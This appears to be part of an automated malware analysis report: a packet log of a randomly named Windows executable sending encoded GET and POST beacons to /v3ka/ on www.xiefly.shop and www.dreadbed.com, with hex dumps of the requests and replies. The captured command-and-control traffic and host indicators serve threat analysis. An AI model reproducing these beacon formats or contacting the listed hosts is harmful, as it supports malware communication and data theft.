29 1b f0 0e ec 60 24 30 62 57 69 f6 20 ab d3 e1 34 e1 60 74 4d 4e 65 1f 90 e8 b3 51 11 53 d3 67 1e c2 6f e7 1f 8b 53 11 87 a5 1e 89 da a4 72 46 d9 4a 6a fc 0f 2c 99 34 f9 a9 94 1a 9d 80 96 d4 6e c9 64 35 63 75 d2 99 a1 03 22 36 97 e7 48 d4 10 27 1e a8 03 ec 34 41 83 78 b0 07 1d d1 36 5d 30 36 90 e1 54 ba e3 d5 2e 1d aa d1 69 34 fa d7 20 78 4e 26 dd 2d 6e d0 31 57 79 1c 39 62 ae 2c bf 02 19 9e d6 9e 41 79 4a 1e d0 00 c6 f1 58 5b e6 c3 e8 a5 c2 28 1a d2 a5 73 3b 6d 0d d6 e2 20 db b2 d4 4c d7 ca 42 c1 47 ba 6e 9b a8 52 22 63
                                                                                    Data Ascii: 3Y|^zsj+ODs2fG \'C\+JK'^H@iRJi=oqHND!)|$PJb!2LES*I|5ENTOM*%hRs@qr2.xS6LK|Cf)^[$g&=DT~{cc`Tm0/Cx6[?Mk@IX\$DiB>A4&)MnA=d2HHE0WMGu+7@_!Ys*f,t@\ !xj1e[I#G_X/G~[Sv?G)p$K>2*u}""a!Kp<C/!~K\O-m"YIx2ymj|DC;?O&yW^[kc(e"A=,g!kks4eR_IB]Fz@Rpt]To?}:!F,dQ;jGA.V/8dXbtFQ*OwI#6z9G9}>[-fOC")`$0bWi 4`tMNeQSgoSrFJj,4nd5cu"6H'4Ax6]06T.i4 xN&-n1Wy9b,AyJX[(s;m LBGnR"c


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.11.304981582.180.172.14806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:08:53.774163961 CET457OUTGET /v3ka/?c4qx7JIP=dNjCJvlouN0lJiHjmW6o9laKqXafrGVThPe+fRU03jlQNeIZZXj0HZnF0wYmB7+6kDtWMlD6FZc6rz3hPOSCoZPNCiuZ/LMstJjl/Jmg62t+iuZuHiG5vvg=&K4W=bb2HuFjPIN HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.xiefly.shop
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Mar 18, 2024 15:08:53.929074049 CET1286INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    content-type: text/html
                                                                                    last-modified: Thu, 23 Jun 2022 13:08:36 GMT
                                                                                    etag: "999-62b465d4-7483b18151e2685e;;;"
                                                                                    accept-ranges: bytes
                                                                                    content-length: 2457
                                                                                    date: Mon, 18 Mar 2024 14:08:53 GMT
                                                                                    server: LiteSpeed
                                                                                    platform: hostinger
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewp
                                                                                    Mar 18, 2024 15:08:53.929173946 CET1286INData Raw: 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6f 70 73 2c 20 73 6f 6d 65 74 68 69 6e 67 20 6c 6f 73
                                                                                    Data Ascii: ort" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks like the page is lost. Start your website on the cheap."> <link media="all" rel="stylesheet" href
                                                                                    Mar 18, 2024 15:08:53.929220915 CET164INData Raw: 78 3b 22 20 63 6c 61 73 73 3d 22 73 75 62 2d 68 65 61 64 65 72 20 74 65 78 74 2d 62 6c 6f 63 6b 2d 6e 61 72 72 6f 77 22 3e 54 68 69 73 20 69 73 20 6e 6f 74 20 61 20 66 61 75 6c 74 2c 20 6a 75 73 74 20 61 6e 20 61 63 63 69 64 65 6e 74 20 74 68 61
                                                                                    Data Ascii: x;" class="sub-header text-block-narrow">This is not a fault, just an accident that was not intentional.</p> </div> </div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.11.3049816198.54.117.242806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:08:59.288155079 CET724OUTPOST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.dreadbed.com
                                                                                    Origin: http://www.dreadbed.com
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 205
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.dreadbed.com/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Raw: 63 34 71 78 37 4a 49 50 3d 33 73 35 7a 48 6f 33 43 4b 67 67 73 45 41 77 43 32 7a 73 4a 50 73 43 55 42 35 63 76 31 57 4f 50 71 47 36 45 7a 64 6d 39 51 38 45 68 72 43 48 74 7a 38 61 64 68 6f 54 43 2f 4a 6b 6d 50 32 4e 50 4d 6c 41 71 4a 51 4c 72 5a 6c 56 43 53 4b 35 6f 74 4d 4f 42 2b 70 4d 4e 7a 72 58 57 54 74 52 73 48 37 2b 73 38 65 70 70 73 4f 4d 36 37 49 48 36 78 47 2b 43 6e 4a 67 5a 39 6b 6f 48 2b 44 78 6b 45 63 5a 78 47 61 6f 6d 74 34 35 4c 38 4c 55 6a 42 64 4d 43 59 53 57 77 55 54 78 30 42 32 30 79 32 4d 2b 31 46 58 71 76 48 54 48 5a 7a 76 31 4c 6f 31 6c 64 4d 73 64 77 4e 57 43 68 35 4d 4e 6f 62 67 3d 3d
                                                                                    Data Ascii: c4qx7JIP=3s5zHo3CKggsEAwC2zsJPsCUB5cv1WOPqG6Ezdm9Q8EhrCHtz8adhoTC/JkmP2NPMlAqJQLrZlVCSK5otMOB+pMNzrXWTtRsH7+s8eppsOM67IH6xG+CnJgZ9koH+DxkEcZxGaomt45L8LUjBdMCYSWwUTx0B20y2M+1FXqvHTHZzv1Lo1ldMsdwNWCh5MNobg==
                                                                                    Mar 18, 2024 15:08:59.461024046 CET324INHTTP/1.1 403 Forbidden
                                                                                    Date: Mon, 18 Mar 2024 14:08:59 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    Server: namecheap-nginx
                                                                                    Content-Encoding: gzip
                                                                                    Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 6a(HML),I310Vp/JLII&T";Ct@}4l"(//=3YNf>%mx0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.11.3049817198.54.117.242806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:09:01.994524002 CET744OUTPOST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.dreadbed.com
                                                                                    Origin: http://www.dreadbed.com
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 225
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.dreadbed.com/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Raw: 63 34 71 78 37 4a 49 50 3d 33 73 35 7a 48 6f 33 43 4b 67 67 73 48 68 41 43 36 77 55 4a 4b 4d 43 62 4e 5a 63 76 73 6d 4f 44 71 47 32 45 7a 63 7a 6c 51 76 73 68 6f 67 66 74 79 39 61 64 6b 6f 54 43 77 70 6b 76 46 57 4d 44 4d 6c 4e 5a 4a 55 4c 72 5a 6c 70 43 53 4c 6c 6f 75 37 61 4f 2f 35 4d 4c 6f 37 58 75 64 4e 52 73 48 37 2b 73 38 66 4e 44 73 4f 45 36 37 34 33 36 77 6a 53 44 35 35 67 47 2b 6b 6f 48 6f 7a 78 6f 45 63 5a 66 47 59 64 4c 74 2b 6c 4c 38 4f 6f 6a 42 4d 4d 42 53 53 57 79 4a 44 78 67 42 55 64 56 76 38 58 46 45 6c 36 38 4f 44 76 34 2f 59 45 52 31 32 52 66 66 4d 68 64 52 58 76 4a 37 4f 4d 7a 47 6e 65 58 43 42 41 41 62 62 4b 5a 75 74 51 58 69 75 69 6e 52 71 49 3d
                                                                                    Data Ascii: c4qx7JIP=3s5zHo3CKggsHhAC6wUJKMCbNZcvsmODqG2EzczlQvshogfty9adkoTCwpkvFWMDMlNZJULrZlpCSLlou7aO/5MLo7XudNRsH7+s8fNDsOE67436wjSD55gG+koHozxoEcZfGYdLt+lL8OojBMMBSSWyJDxgBUdVv8XFEl68ODv4/YER12RffMhdRXvJ7OMzGneXCBAAbbKZutQXiuinRqI=
                                                                                    Mar 18, 2024 15:09:02.195728064 CET324INHTTP/1.1 403 Forbidden
                                                                                    Date: Mon, 18 Mar 2024 14:09:02 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    Server: namecheap-nginx
                                                                                    Content-Encoding: gzip
                                                                                    Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 6a(HML),I310Vp/JLII&T";Ct@}4l"(//=3YNf>%mx0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.11.3049818198.54.117.242806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:09:04.706928968 CET1661OUTPOST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.dreadbed.com
                                                                                    Origin: http://www.dreadbed.com
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 1141
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.dreadbed.com/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Raw: 63 34 71 78 37 4a 49 50 3d 33 73 35 7a 48 6f 33 43 4b 67 67 73 48 68 41 43 36 77 55 4a 4b 4d 43 62 4e 5a 63 76 73 6d 4f 44 71 47 32 45 7a 63 7a 6c 51 76 30 68 6f 56 44 74 7a 65 79 64 6e 6f 54 43 39 4a 6b 69 46 57 4e 5a 4d 6c 56 47 4a 55 48 37 5a 6a 6c 43 54 70 42 6f 35 2f 32 4f 78 35 4d 4c 33 72 58 56 54 74 52 44 48 2f 62 6b 38 66 64 44 73 4f 45 36 37 37 76 36 67 47 2b 44 37 35 67 5a 39 6b 70 56 2b 44 78 45 45 63 42 70 47 62 78 39 74 74 39 4c 35 65 59 6a 48 36 34 42 55 43 57 73 49 44 77 6e 42 55 42 4b 76 38 61 32 45 6b 65 57 4f 44 58 34 75 4a 41 48 6b 79 5a 77 44 38 31 44 55 56 2f 30 39 49 45 5a 4c 6e 79 59 4b 78 56 39 63 66 69 45 33 6f 73 2f 35 62 75 50 45 66 67 59 6f 79 48 2f 63 35 37 43 51 63 56 43 6a 5a 6e 52 6a 47 4b 68 6f 68 55 4a 2b 35 44 67 64 65 6d 39 47 37 6e 4d 45 43 4d 30 31 55 78 7a 2f 6f 64 75 75 2b 77 32 30 51 72 57 39 54 78 61 50 50 69 65 69 57 30 44 64 73 42 31 75 6f 71 2f 37 37 35 46 47 33 78 5a 2f 74 36 65 53 70 57 36 76 4a 41 46 6e 30 37 4d 30 36 79 37 77 65 51 2b 4b 75 47 75 66 75 2f 42 34 55 48 72 4f 52 4d 50 68 61 41 37 53 47 72 41 53 54 41 49 53 61 4f 31 73 55 43 4e 58 36 44 4b 6c 58 48 33 6c 77 50 71 38 62 38 52 34 74 66 4b 78 72 5a 45 38 4e 54 58 5a 78 41 74 45 55 37 4b 6d 75 6a 6d 46 2f 66 6a 58 38 32 38 72 4e 34 43 34 47 31 78 7a 2f 77 37 6c 70 41 35 49 70 6c 2f 68 6d 75 6b 6d 49 4e 32 5a 32 55 76 6a 52 72 64 2b 71 4e 65 4d 48 5a 4e 74 31 36 4f 2b 59 69 4a 30 5a 36 72 4f 68 64 6c 79 58 37 36 68 75 64 66 6c 62 41 31 37 4e 64 36 59 4d 2f 65 6c 53 45 70 2b 31 73 79 48 2f 79 33 2b 68 6e 77 69 71 38 64 72 32 38 54 42 47 42 65 56 41 79 75 30 5a 33 51 34 6c 31 38 5a 6a 75 59 77 71 4b 47 56 59 6e 64 4e 72 59 4b 67 4e 41 72 42 41 68 50 54 6b 56 50 6b 6c 77 67 2f 58 61 71 6e 6a 4c 53 63 79 65 6d 55 5a 6e 64 6d 30 6b 32 6e 4b 79 68 55 6d 38 46 48 6e 2f 51 64 6d 33 57 46 70 70 36 4a 44 50 2b 45 4a 62 4a 54 67 50 41 53 5a 2b 2f 44 74 74 52 57 2f 4c 46 38 69 49 35 42 67 63 51 48 75 34 46 72 76 74 36 59 4d 78 63 34 37 67 71 39 72 42 4b 53 70 42 75 46 4a 71 6c 43 37 48 2b 41 34 42 71 67 65 73 30 6e 68 74 58 4f 47 38 51 69 62 4f 35 76 79 6c 53 2f 67 6c 39 4b 46 69 38 37 6e 5a 52 46 5a 76 75 30 56 4a 56 53 51 6d 45 44 36 47 72 49 63 58 4b 54 42 41 66 4a 65 6f 35 56 69 73 37 6a 50 6d 33 33 62 2f 71 7a 75 35 69 62 38 63 38 58 79 52 79 36 62 2f 65 65 43 74 4a 78 32 37 72 36 64 4f 72 2f 6d 5a 77 71 45 68 71 67 6c 30 72 6c 51 33 72 6a 51 6c 48 4f 54 4e 78 43 7a 76 4b 65 4e 5a 38 2b 31 59 6b 37 38 77 38 4a 50 6b 49 74 4d 48 77 69 70 45 2f 75 2b 5a 6c 30 2f 32 74 6d 2b 62 36 61 70 70 4e 52 75 6b 79 64 47 53 4b 6f 6c 61 69 54 74 34 51 73 2f 39 34 79 55 67 53 34 54 63 64 74 39 6b 38 32 4f 75 54 32 33 79 5a 44 61 34 39 71 73 32 6a 66 67 44 7a 36 73 32 5a 74 37 47 30 38 6f 39 44 53 67 6c 63 39 52 36 49 79 31 31 2b 30 69 2f 52 44 6c 37 6b 64 79 62 6d 75 79 76 53 34 2b 41 5a 63 76 43 41 66 78 38 2b 6f 68 76 37 54 72 51 52 6e 51 4d 30 41 35 6d 34 56 34 38 77 6e 44 72 37 6d 35 79 57 2f 57 79 4b 2b 41 33 54 58 59 72 55 48 43 77 56 78 50 53 4c 59 6b 2b 6c 31 6f 4e 73 79 2b 45 44 55 53 72 76 77 38 37 34 62 34 56 4d 55 61 73 2f 35 51 36 61 4b 4e 51 72 7a 55 4d 45 52 71 39 68 6e 48 34 58 70 35 52 63 5a 52 57 54 46 33 36 49 59 70 31 63 51 63 50 47 42 64 5a 36 47 2f 42 38 71 71 6e 50 56 69 6e 52 4e 68 6b 74 58 36 39 65 49 49 2b 34 6e 70 72 6c 6a 43 36 4d 2f 70 6f 6d 63 5a 43 42 62 7a 67 45 4b 47 42 6a 70 38 6f 71 7a 6d 6a 47 45 66 54 7a 55 75 32 4e 52 55 66 77 53 35 6e 6a
                                                                                    Data Ascii: c4qx7JIP=3s5zHo3CKggsHhAC6wUJKMCbNZcvsmODqG2EzczlQv0hoVDtzeydnoTC9JkiFWNZMlVGJUH7ZjlCTpBo5/2Ox5ML3rXVTtRDH/bk8fdDsOE677v6gG+D75gZ9kpV+DxEEcBpGbx9tt9L5eYjH64BUCWsIDwnBUBKv8a2EkeWODX4uJAHkyZwD81DUV/09IEZLnyYKxV9cfiE3os/5buPEfgYoyH/c57CQcVCjZnRjGKhohUJ+5Dgdem9G7nMECM01Uxz/oduu+w20QrW9TxaPPieiW0DdsB1uoq/775FG3xZ/t6eSpW6vJAFn07M06y7weQ+KuGufu/B4UHrORMPhaA7SGrASTAISaO1sUCNX6DKlXH3lwPq8b8R4tfKxrZE8NTXZxAtEU7KmujmF/fjX828rN4C4G1xz/w7lpA5Ipl/hmukmIN2Z2UvjRrd+qNeMHZNt16O+YiJ0Z6rOhdlyX76hudflbA17Nd6YM/elSEp+1syH/y3+hnwiq8dr28TBGBeVAyu0Z3Q4l18ZjuYwqKGVYndNrYKgNArBAhPTkVPklwg/XaqnjLScyemUZndm0k2nKyhUm8FHn/Qdm3WFpp6JDP+EJbJTgPASZ+/DttRW/LF8iI5BgcQHu4Frvt6YMxc47gq9rBKSpBuFJqlC7H+A4Bqges0nhtXOG8QibO5vylS/gl9KFi87nZRFZvu0VJVSQmED6GrIcXKTBAfJeo5Vis7jPm33b/qzu5ib8c8XyRy6b/eeCtJx27r6dOr/mZwqEhqgl0rlQ3rjQlHOTNxCzvKeNZ8+1Yk78w8JPkItMHwipE/u+Zl0/2tm+b6appNRukydGSKolaiTt4Qs/94yUgS4Tcdt9k82OuT23yZDa49qs2jfgDz6s2Zt7G08o9DSglc9R6Iy11+0i/RDl7kdybmuyvS4+AZcvCAfx8+ohv7TrQRnQM0A5m4V48wnDr7m5yW/WyK+A3TXYrUHCwVxPSLYk+l1oNsy+EDUSrvw874b4VMUas/5Q6aKNQrzUMERq9hnH4Xp5RcZRWTF36IYp1cQcPGBdZ6G/B8qqnPVinRNhktX69eII+4nprljC6M/pomcZCBbzgEKGBjp8oqzmjGEfTzUu2NRUfwS5nj
                                                                                    Mar 18, 2024 15:09:04.920751095 CET324INHTTP/1.1 403 Forbidden
                                                                                    Date: Mon, 18 Mar 2024 14:09:04 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    Server: namecheap-nginx
                                                                                    Content-Encoding: gzip
                                                                                    Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 6a(HML),I310Vp/JLII&T";Ct@}4l"(//=3YNf>%mx0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.11.3049819198.54.117.242806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:09:07.414069891 CET458OUTGET /v3ka/?c4qx7JIP=6uRTEcONOSwyaRtl3SIdI/7ZcaxdnFD0iGrt2seiEdMiqBKCwYyYvMrO5fxXMQNYUGElLXPpIQYaUrVgpe2t46086L+DcudheMq8m5F90vo+8IbH2nL0hLQ=&K4W=bb2HuFjPIN HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.dreadbed.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Mar 18, 2024 15:09:07.638802052 CET1286INHTTP/1.1 200 OK
                                                                                    Date: Mon, 18 Mar 2024 14:09:07 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    Set-Cookie: SessionId=ecde018735e1471a979a5a0a5bd19ed8; domain=.www.namecheap.com; path=/; httponly
                                                                                    Set-Cookie: x-ncpl-csrf=1c05ca0950124b0195eb022290480c8b; domain=.www.namecheap.com; path=/; secure; samesite=none
                                                                                    X-Proxy-Cache: HIT
                                                                                    Server: namecheap-nginx
